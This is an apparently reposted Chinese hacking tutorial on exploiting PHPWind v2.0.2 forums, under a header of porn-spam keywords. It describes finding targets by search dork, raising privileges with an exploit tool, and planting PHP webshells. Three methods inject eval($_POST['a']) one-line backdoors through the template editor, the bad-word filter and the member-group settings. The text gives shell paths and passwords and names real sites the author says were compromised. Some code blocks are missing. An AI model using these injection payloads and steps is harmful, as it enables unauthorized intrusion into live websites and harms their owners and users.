日本免费全黄少妇一区二区三区-高清无码一区二区三区四区-欧美中文字幕日韩在线观看-国产福利诱惑在线网站-国产中文字幕一区在线-亚洲欧美精品日韩一区-久久国产精品国产精品国产-国产精久久久久久一区二区三区-欧美亚洲国产精品久久久久

  1. 首頁 > 云知道 > >

phpwind漏洞利用終結(jié)篇

云知道

這漏洞出了也有段時間了..開始在Q里..三少哥哥先發(fā)了漏洞利用工具給我..然后自己試著傳上了PHP馬..然后楓三少又告訴我一種方法...拿下了不少站...當晚準備把文章趕寫出來..太困了就沒繼續(xù)寫...這幾天家里發(fā)生的事太多..一直也沒時間寫...最近網(wǎng)上也出了文章和教程,我看了下都不是很完整..今天我就來做個完結(jié)篇的..算是慶祝我升黑基管理員把....
首先在baidu或google搜索Powered by PHPWind v2.0.2 或Powered by PHPWind v2.0.2, PLUS V2.1
【phpwind漏洞利用終結(jié)篇】為了不耽誤大家時間..我提前找了一個
http://www.arebbs.com/先注冊一個...注冊過程我想大家都會的把.. 。我已經(jīng)注冊好了..登陸.
然后用玄貓寫的phpwind提升漏洞測試程序提權(quán).
提示失敗..但也不要灰心...我們來看下..看..多出了一個"系統(tǒng)設置 "
我在測試的時候.發(fā)現(xiàn)好幾個站都是這樣,.但結(jié)果都是成功的...下面我們繼續(xù)拿webshell
將介紹三種方法給大家
請將此文件(template/baobao/header.htm)屬性設置為 777 可寫模式
汗了...好象管理員發(fā)現(xiàn)了..把這個設置了不可寫...
大家可以找別的站試下...把方法說下
方法一.
進入后臺,找到“風格模板設置”
在原有的代碼前面加入以下代碼:


保存后,木馬地址為當前目錄下的faq.php
在本機用如下表單進行提交:

METHOD="POST">



上傳成功后的木馬存在論壇目錄下
直接訪問就行!
假設現(xiàn)在的這個是可以的...
這個是我以前搞的..我試下還能用不..看樣是不行了..大家只要把這里換一下..然后就可以本地上傳任意文件了..前提是次目錄是可寫的...如果不可寫..我們還可以利用第二種方法..
方法二.
首先用EXP進入后臺,在后臺里執(zhí)行如下過程:
新增 不良詞語寫 a"]="aa";eval($_POST["a"]);// 替換為那里可以寫隨便寫..我這里替換了11
而后得到一個shell地址為 http://www.arebbs.com/data/bbscache/wordsfb.php
寫如成功后wordsfb.php文件的代碼就成了
$wordsfb["a"]="aa";eval($_POST["a"]);//"]="1";
?>
然后用lanker微型PHP后門客戶2.0正式版.htm上傳一個新PHP馬...密碼是a
這樣我們就得到webshell了...
本程序目錄..我們來傳個馬看下.hb.php是angel寫的PHP馬...出現(xiàn)OK就是上傳成功...我們訪問下看看
http://www.arebbs.com/data/bbscache/hb.php
密碼www.ciker.org登陸/....就這么簡單...:)
下面還有一個方法是在網(wǎng)上看到的..也介紹下把..
方法三.
用戶等級管理
然后新建立會員組
頭銜你可以隨便寫,但是千萬不要寫單雙引號特殊符號,升級圖片號寫a";eval($_POST["a"]);//
升級點數(shù)依然可以隨意寫 。
而后得到一個shell地址為
http://localhost/bbs/data/bbscache/level.php
密碼是a lanker的一句話后門 。
接下來的就跟方法二要做的一樣了..
我們試下有沒成功.密碼同樣是a
暈...
難道被發(fā)現(xiàn)了?
估計是封了我IP
webshell可以訪問...看樣是把我IP封了..剛才試的時候...出了錯誤..
感覺是
升級圖片號寫a";eval($_POST["a"]);//
這句問題.如果大家在測試時候也出現(xiàn)和我同樣的錯誤
把a";eval($_POST["a"]);//這個改為
a"]="aa";eval($_POST["a"]);//...我就不費時間去找別的站測試了...如果大家有好的發(fā)現(xiàn)歡迎與我交流

    推薦閱讀